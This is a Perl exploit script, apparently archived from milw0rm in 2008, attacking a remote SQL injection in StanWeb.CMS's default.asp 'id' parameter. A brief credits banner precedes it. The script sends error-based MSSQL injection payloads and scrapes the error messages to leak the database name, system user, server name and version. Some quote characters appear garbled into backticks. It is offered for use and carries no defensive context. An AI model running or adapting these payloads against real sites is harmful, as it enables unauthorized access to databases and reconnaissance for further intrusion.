StanWeb.CMS (default.asp id) Remote SQL Injection Exploit# --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- # --==+ StanWeb.CMS (default.asp id) Remote SQL Injection Exploit +==-- # --==+====================================================================================+==-- # [+] [JosS] + [Spanish Hackers Team] + [Sys - Project] # [+] Info: # [~] Software: StanWeb.CMS # [~] Exploit: Remote SQL Injection [High] # [~] Bug Found By: JosS # [~] Contact: sys-project[at]hotmail.com # [~] Web: http://www.spanish-hackers.com # [~] Vuln File: default.asp # [+] Exploit: #!/usr/bin/perl # StanWeb.CMS (default.asp id) Remote SQL Injection Exploit # Code by JosS # Contact: sys-project[at]hotmail.com # Spanish Hackers Team / EspSeC # www.spanish-hackers.com # in memory of rgod :D use IO::Socket::INET; use LWP::UserAgent; use HTTP::Request; use LWP::Simple; sub lw { my $SO = $^O; my $linux = ``; if (index(lc($SO),`win`)!=-1){ $linux=`0`; }else{ $linux=`1`; } if($linux){ system(`clear`); } else{ system(`cls`); system (`title StanWeb.CMS (default.asp id) Remote SQL Injection Exploit`); system (`color 02`); } } #*************************** expl ****************************** &lw; print `\t\t########################################################\n\n`; print `\t\t# StanWeb.CMS - Remote SQL Injection Exploit #\n\n`; print `\t\t# by JosS #\n\n`; print `\t\t########################################################\n\n`; $host=$ARGV[0]; chop $host; $host=$host.`/default.asp?id=`; if(!$ARGV[0]) { print `\n[x] StanWeb.CMS - Remote SQL Injection Exploit\n`; print `[x] written by JosS - sys-project[at]hotmail.com\n`; print `[x] usage: perl $0 [host]\n`; print `[x] example: http://hostxx.com/web\n`; exit(1); } @comando=(`1+and+1=convert(int,db_name())`,`1+and+1=convert(int,system_user)`,`1+and+1=convert(int,\@\@servername)--`,'1+and+1=convert(int,@@version)--'); for ($i=0;$i<=3;$i++) { my $final = $host.$comando[$i]; my $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => $final); $doc = $ua->request($req)->as_string; if ( $doc =~ /Syntax\s(.*)<\/font>/mosix ) { if ($comando[$i] eq `1+and+1=convert(int,db_name())`) { print `db_name:\n`; $dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/); print `$dbname\n\n`; } if ($comando[$i] eq `1+and+1=convert(int,system_user)`) { print `system_user:\n`; $systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/); print `$systemuser\n\n`; } if ($comando[$i] eq `1+and+1=convert(int,\@\@servername)--`) { print `servername:\n`; $servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/); print `$servername\n\n`; } if ($comando[$i] eq '1+and+1=convert(int,@@version)--') { print `version:\n`; $version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm); print `$version\n\n`; } } # Cierre del if principal } # cierre for # --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- # --==+ JosS +==-- # --==+====================================================================================+==-- # [+] [The End] # milw0rm.com [2008-05-16]